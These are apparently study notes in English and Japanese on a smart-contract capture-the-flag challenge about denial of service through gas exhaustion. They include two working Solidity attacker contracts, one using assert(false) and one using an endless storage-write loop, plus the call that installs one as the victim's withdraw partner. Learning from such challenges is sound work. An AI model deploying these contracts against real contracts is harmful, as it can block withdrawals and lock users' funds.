partner.call{value:amountToSend}("");
invoke the receive method of evil contract
Since writing to storage is one of the most expensive operations, I will chose it for exhausting the gas in the malicious GasBurner:
Contrary to revert and require, the assert instruction consumes all gas.
contract DenialAttacker {
fallback() external payable {
// assert consumes all (!) gas
assert(false);
}
}
await contract.setWithdrawPartner('<gas-DenialAttacker-address>')
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract GasBurner {
uint256 n;
function burn() internal {
while (gasleft() > 0) {
n += 1;
}
}
receive() external payable {
burn();
}
}
callの予備元を変更されると弱いのよね
partnerっていうaddressを変更されて、そこのcallが呼ばれた際にfallbackやらがよばれる
addressに対してetherが来たときに使える
‣
fallback func ⇒ If there is no signature of function, fallback function is executing
また、コントラクトがEtherを受け取る時にも呼ばれる